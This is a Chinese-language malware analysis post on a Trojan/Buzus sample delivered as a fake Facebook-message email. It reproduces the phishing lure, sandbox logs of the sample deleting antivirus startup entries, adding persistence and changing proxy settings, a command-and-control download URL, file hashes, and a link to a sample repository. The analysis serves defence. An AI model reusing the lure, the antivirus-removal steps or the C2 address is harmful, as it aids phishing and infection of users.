样本分析-TrojanBuzus“霸族”木马通过邮件传播

XT 2019-12-12 20:31:00

Trojan/Buzus“霸族”木马通过邮件传播

背景


探针恶意邮件样本中发现此木马,邮件内容如下:

1
2
3
4
5
6
收件人:<脱敏内容>
日期:Mon, 9 Sep 2019 12:58:31 +0800
主题:You have got a new message on Facebook!

邮件内容:Facebookfacebook Hi,You have got a personal message on Facebook from your friend.To read it please check the attachment.Thanks, The Facebook Team
附件:Facebook message.zip(227130)

关于buzus

翻阅网上的关于霸族的资料介绍如下:
W32/Buzus是一种蠕虫,它通过将自身复制到可移动驱动器来传播,并试图从受损的计算机中窃取机密信息。https://www.symantec.com/security-center/writeup/2009-121019-2757-99
霸族本身存在蠕虫行为,且存在传染性可能。本次样本发现为木马类buzus,或同源Trojan.AgentWDCR.HWI行为,基于各厂商对病毒命名不同略有差别。https://www.virustotal.com/gui/file/e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504/detection

基本信息

文件名称: document.exe
文件大小: 394KB (403968bytes)
文件类型: PE32 executable (GUI) Intel 80386, for MS Windows
开始时间: 2019-09-09 12:54:18
MD5: c1a5ba03f0ba9832cc87180a4c4622a5[virustotal]
SHA1: b6c0f0588c8efffc48f308dfddecbf6170204dd9
壳或编译器信息: 无匹配信息

动态分析

前台无任何异常,进程看到子程序调用,rundll32.exe调用并处在运行,可看到触发报错告警。

可以观察到rundll32.exe调用plareb.dll运行命令:

通过行为分析复盘可以看到:
document.exe再执行时开始创建调起进程:”%Temp%\NvMcTray.exe”


查找删除防护软件注册表操作:

样本行为审计可以总结下完整的样本document.exe行为:document.exe运行创建%Temp%\NvMcTray.exe和%Temp%\NvTaskbarInit.exe(这个是受保护隐藏的备份),之后通过NvMcTray.exe进行正常流程调用rundll32.exe运行,删除英伟达注册表并新增额外启动项指向隐藏备份的释放文件NvTaskbarInit.exe,开启代理,删除防护软件启动项等操作。之后NvTaskbarInit.exe还会调用下载dll进行后续下载操作。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
[CreateProcess] document.exe:2372 > "%UserProfile%\Desktop\document.exe"	[Child PID: 2856]
[CreateProcess] document.exe:2856 > "%Temp%\NvMcTray.exe" [Child PID: 2968]
[CreateFile] document.exe:2856 > %LocalAppData%\Temp\1\NvTaskbarInit.exe [SHA256: e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504]
[CreateFile] document.exe:2856 > %LocalAppData%\Temp\1\NvTaskbarInit.exe [SHA256: e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504]
[CreateFile] document.exe:2856 > %LocalAppData%\Temp\1\NvTaskbarInit.exe [SHA256: e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504]
[CreateFile] document.exe:2856 > %LocalAppData%\Temp\1\NvTaskbarInit.exe [SHA256: e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504]
[CreateFile] document.exe:2856 > %LocalAppData%\Temp\1\NvMcTray.exe [SHA256: 5877a70e36f1d51945837daae394da0275ca57e8acbb725fad992b454b7d16c6]
[CreateFile] document.exe:2856 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat [SHA256: 196ba3121fba4cb7e6dadc93f46bda0450996aed308325f124ac7a508ff6bb10]
[CreateFile] document.exe:2856 > %AppData%\Microsoft\Windows\Cookies\index.dat [SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a]
[CreateFile] document.exe:2856 > %LocalAppData%\Microsoft\Windows\History\History.IE5\index.dat [SHA256: 3269095d5a98d381acfa4bdfab9e47d2e58f84bf646bf5a4bf2a3f6c6630203c]
[RegDeleteValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
[RegDeleteValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
[RegDeleteValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\APVXDWIN
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\avast!
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AVG8_TRAY
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\AVP
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\BDAgent
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\CAVRID
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\cctray
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\egui
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\F-PROT Antivirus Tray application
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ISTray
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\K7SystemTray
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\K7TSStart
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\McENUI
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\MskAgentexe
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\OfficeScanNT Monitor
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\RavTask
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SBAMTray
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\sbamui
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SCANINICIO
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Spam Blocker for Outlook Express
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SpamBlocker
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\SpIDerMail
[RegDeleteValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Defender
[RegSetValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\nvidia01 = 09
[RegSetValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\nvidia02 = 10
[RegSetValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = 0
[RegSetValue] document.exe:2856 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Nvidia Control Center = C:\Users\LAB-WI~1\AppData\Local\Temp\1\NvTaskbarInit.exe
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASAPI32\ConsoleTracingMask = 4294901760
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASAPI32\EnableConsoleTracing = 0
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASAPI32\EnableFileTracing = 0
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASAPI32\FileDirectory = %windir%\tracing
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASAPI32\FileTracingMask = 4294901760
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASAPI32\MaxFileSize = 1048576
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASMANCS\ConsoleTracingMask = 4294901760
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASMANCS\EnableConsoleTracing = 0
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASMANCS\EnableFileTracing = 0
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASMANCS\FileDirectory = %windir%\tracing
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASMANCS\FileTracingMask = 4294901760
[RegSetValue] document.exe:2856 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\document_RASMANCS\MaxFileSize = 1048576

NvTaskbarInit.exe样本行为审计:释放plareb.dll到%LocalAppData%\plareb.dll,调用rundll32.exe运行dll。

1
2
3
4
[CreateProcess] NvMcTray.exe:2968 > "rundll32.exe %LocalAppData%\plareb.dll,Startup"	[Child PID: 1584]
[CreateFile] NvMcTray.exe:2968 > %LocalAppData%\plareb.dll [SHA256: c38239c98d9ba20e7af37cd7e516dc69d3accfaf699d9d517976f6cfeccb052c]
[RegSetValue] NvMcTray.exe:2968 > HKCU\Software\Microsoft\Windows\CurrentVersion\Jyitoz\Ekixeda = 42 01 30 03 41 05 40 07 3C 09 4F 0B 3E 0D 3E 0F(转码为:undefined)
[RegSetValue] NvMcTray.exe:2968 > HKCU\Software\Microsoft\Windows\CurrentVersion\Jyitoz\Yhukeb = 43 01 38 03 58 05 53 07 7B 09 6F 0B 7E 0D 7D 0F(转码为:undefined)

rundll32.exe调用行为审计:
rundll32.exe 运行%LocalAppData%\efazufer.dll,运行_5b78e6e8a21a43cd8ced445ed9ca5ed30ca6835_0b3cf67e\Report.wer,运行%LocalAppData%\plareb.dll,修改注册表,修改cookie等。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
[CreateProcess] NvMcTray.exe:2968 > "rundll32.exe %LocalAppData%\plareb.dll,Startup"	[Child PID: 1584]
[CreateProcess] rundll32.exe:1584 > "rundll32.exe %LocalAppData%\plareb.dll,iep" [Child PID: 2616]
[CreateProcess] rundll32.exe:1584 > "rundll32.exe %LocalAppData%\plareb.dll,iep" [Child PID: 2272]
[CreateFolder] rundll32.exe:2616 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5
[CreateFile] rundll32.exe:2616 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat [SHA256: 196ba3121fba4cb7e6dadc93f46bda0450996aed308325f124ac7a508ff6bb10]
[CreateFolder] rundll32.exe:2616 > %AppData%\Microsoft\Windows\Cookies
[CreateFile] rundll32.exe:2616 > %AppData%\Microsoft\Windows\Cookies\index.dat [SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a]
[CreateFolder] rundll32.exe:2616 > %LocalAppData%\Microsoft\Windows\History\History.IE5
[CreateFile] rundll32.exe:2616 > %LocalAppData%\Microsoft\Windows\History\History.IE5\index.dat [SHA256: 3269095d5a98d381acfa4bdfab9e47d2e58f84bf646bf5a4bf2a3f6c6630203c]
[CreateFile] rundll32.exe:2616 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\BQES0LUV\get2[1].htm [SHA256: f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0]
[CreateFile] rundll32.exe:2616 > %LocalAppData%\efazufer.dll [SHA256: f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0]
[CreateFile] WerFault.exe:2864 > %LocalAppData%\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_5b78e6e8a21a43cd8ced445ed9ca5ed30ca6835_0b3cf67e\Report.wer [SHA256: 33e3065cc7fe4f4a6c7b707fbef7a138a81cdc7906fcf2b565be5e91ec17ec08]
[CreateFile] WerFault.exe:2864 > %LocalAppData%\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_5b78e6e8a21a43cd8ced445ed9ca5ed30ca6835_0b3cf67e\Report.wer [SHA256: 33e3065cc7fe4f4a6c7b707fbef7a138a81cdc7906fcf2b565be5e91ec17ec08]
[CreateFolder] rundll32.exe:2272 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5
[CreateFile] rundll32.exe:2272 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat [SHA256: 196ba3121fba4cb7e6dadc93f46bda0450996aed308325f124ac7a508ff6bb10]
[CreateFolder] rundll32.exe:2272 > %AppData%\Microsoft\Windows\Cookies
[CreateFile] rundll32.exe:2272 > %AppData%\Microsoft\Windows\Cookies\index.dat [SHA256: 75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a]
[CreateFolder] rundll32.exe:2272 > %LocalAppData%\Microsoft\Windows\History\History.IE5
[CreateFile] rundll32.exe:2272 > %LocalAppData%\Microsoft\Windows\History\History.IE5\index.dat [SHA256: 3269095d5a98d381acfa4bdfab9e47d2e58f84bf646bf5a4bf2a3f6c6630203c]
[CreateFile] rundll32.exe:2272 > %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\YYP4M2G5\get2[1].htm [SHA256: f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0]
[CreateFile] rundll32.exe:2272 > %LocalAppData%\amamuwesebebe.dll [SHA256: f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0]
[RegSetValue] rundll32.exe:1584 > HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Akiliyuwamo = rundll32.exe "C:\Users\LAB-windows2008\AppData\Local\plareb.dll",Startup
[RegSetValue] rundll32.exe:1584 > HKCU\Software\Microsoft\Windows\CurrentVersion\Jyitoz\Sgayicelotef = 168
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Jyitoz\Yhukeb = 43 01 38 03 58 05 53 07 7B 09 6F 0B 7E 0D 7D 0F
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Jyitoz\Jnaperote = 31 01 31 03 35 05 30 07 08 09
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASAPI32\EnableFileTracing = 0
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASAPI32\EnableConsoleTracing = 0
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASAPI32\FileTracingMask = 4294901760
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASAPI32\ConsoleTracingMask = 4294901760
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASAPI32\MaxFileSize = 1048576
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASAPI32\FileDirectory = %windir%\tracing
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASMANCS\EnableFileTracing = 0
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASMANCS\EnableConsoleTracing = 0
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASMANCS\FileTracingMask = 4294901760
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASMANCS\ConsoleTracingMask = 4294901760
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASMANCS\MaxFileSize = 1048576
[RegSetValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Tracing\rundll32_RASMANCS\FileDirectory = %windir%\tracing
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = 0
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 46 00 00 00 0A 00 00 00 09 00 00 00 00 00 00 00
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 46 00 00 00 06 00 00 00 09 00 00 00 00 00 00 00
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegDeleteValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 0
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegDeleteValue] rundll32.exe:2616 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 0
[RegSetValue] rundll32.exe:2616 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Jyitoz\Yhukeb = 43 01 38 03 58 05 53 07 7B 09 6F 0B 7E 0D 7D 0F
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = 0
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyOverride
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 46 00 00 00 0B 00 00 00 09 00 00 00 00 00 00 00
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2272 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegDeleteValue] rundll32.exe:2272 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 0
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2272 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass
[RegDeleteValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegDeleteValue] rundll32.exe:2272 > HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 0
[RegSetValue] rundll32.exe:2272 > HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 0

网络行为发现连接大量域名IP,主要两处:

1
2
3
whatismyip.com/automation/n09230945.asp(确定本地IP地址)
crl.microsoft/pki/crl/products/CSPCA.crl(校验.net证书)
081007e30903.lantzel.com/get2.php?c=CNEUQIGW&d=26606B67393435363E2F676268307D3F222022222425243177757E4469747A224213131B1212151E0E5C434F116F1C6A76057701040172050A0D0309797F7F0C7304707A01707E767F7E0C7F7F6B2C263E2737216964606F7E31333F616E6A3A535155505243070305545A4D031E180A024C442C455329031B12474B4C4D4E47B6B0B6BABDA3F6F5E7EAB7F9F9E3EAE3FCA2A0BDF1EDF3B1F4FDABC4F9A0AFB9C3CDCCD7FBC09B978EDE9C9F919C88C98D8094C1898490D4D6DDD6869AD4DADEB4A4FFF2F6FDF0F6FEFCF8FFFDEB8B8082

静态分析

情况基本一致不在赘述:





IOCs:

文件hash
4e04c09cb0c3b3b2375d9e2e92a9e0e82f115c9011ca16a34cc83b4b94a730dc
f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0
4e04c09cb0c3b3b2375d9e2e92a9e0e82f115c9011ca16a34cc83b4b94a730dc
e53e796d032239c68fa1d485372c69d2232a4a269547f9da959d03f7ed448870
f5853afb6b66570e29fcf6cae815ffb001970e179d24f7739d2efedc317e0ead
e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504
e117b82bd7c22e656f0e508dcd9ee7e4cf918cf9feacd170236eea67fd6a1984
f6846e5625a17d76a1a6e954ba67ee14896e0f7350030f5f61c3218b6463af4c
28619bf9a073ce5ade879ef7123c5a60f28bdfead6997c63540e1a5fede309e6
07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541
2454bcaae690d629420b45e7db2297269cd97ccb1bb2640401d23f0a1d9b5bcc
e41e19b9ee8889b3887b8cacf264468c661bdf382706bbd9052c1f95c4eea504
5877a70e36f1d51945837daae394da0275ca57e8acbb725fad992b454b7d16c6
c38239c98d9ba20e7af37cd7e516dc69d3accfaf699d9d517976f6cfeccb052c
196ba3121fba4cb7e6dadc93f46bda0450996aed308325f124ac7a508ff6bb10
75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
3269095d5a98d381acfa4bdfab9e47d2e58f84bf646bf5a4bf2a3f6c6630203c
196ba3121fba4cb7e6dadc93f46bda0450996aed308325f124ac7a508ff6bb10
75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
3269095d5a98d381acfa4bdfab9e47d2e58f84bf646bf5a4bf2a3f6c6630203c
f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0
33e3065cc7fe4f4a6c7b707fbef7a138a81cdc7906fcf2b565be5e91ec17ec08
196ba3121fba4cb7e6dadc93f46bda0450996aed308325f124ac7a508ff6bb10
75d0b1743f61b76a35b1fedd32378837805de58d79fa950cb6e8164bfa72073a
3269095d5a98d381acfa4bdfab9e47d2e58f84bf646bf5a4bf2a3f6c6630203c
f0a3eec2709682107edae2372e8984e15bd3b2b7e3de9878ba76cd69cc556ce0

HOST:
081007e30903.lantzel.com/get2.php?c=CNEUQIGW&d=26606B67393435363E2F676268307D3F222022222425243177757E4469747A224213131B1212151E0E5C434F116F1C6A76057701040172050A0D0309797F7F0C7304707A01707E767F7E0C7F7F6B2C263E2737216964606F7E31333F616E6A3A535155505243070305545A4D031E180A024C442C455329031B12474B4C4D4E47B6B0B6BABDA3F6F5E7EAB7F9F9E3EAE3FCA2A0BDF1EDF3B1F4FDABC4F9A0AFB9C3CDCCD7FBC09B978EDE9C9F919C88C98D8094C1898490D4D6DDD6869AD4DADEB4A4FFF2F6FDF0F6FEFCF8FFFDEB8B8082
081007e30903.lantzel.com

样本地址

https://github.com/XTpeeps/MalwareSamples/tree/master/Trojan_Buzus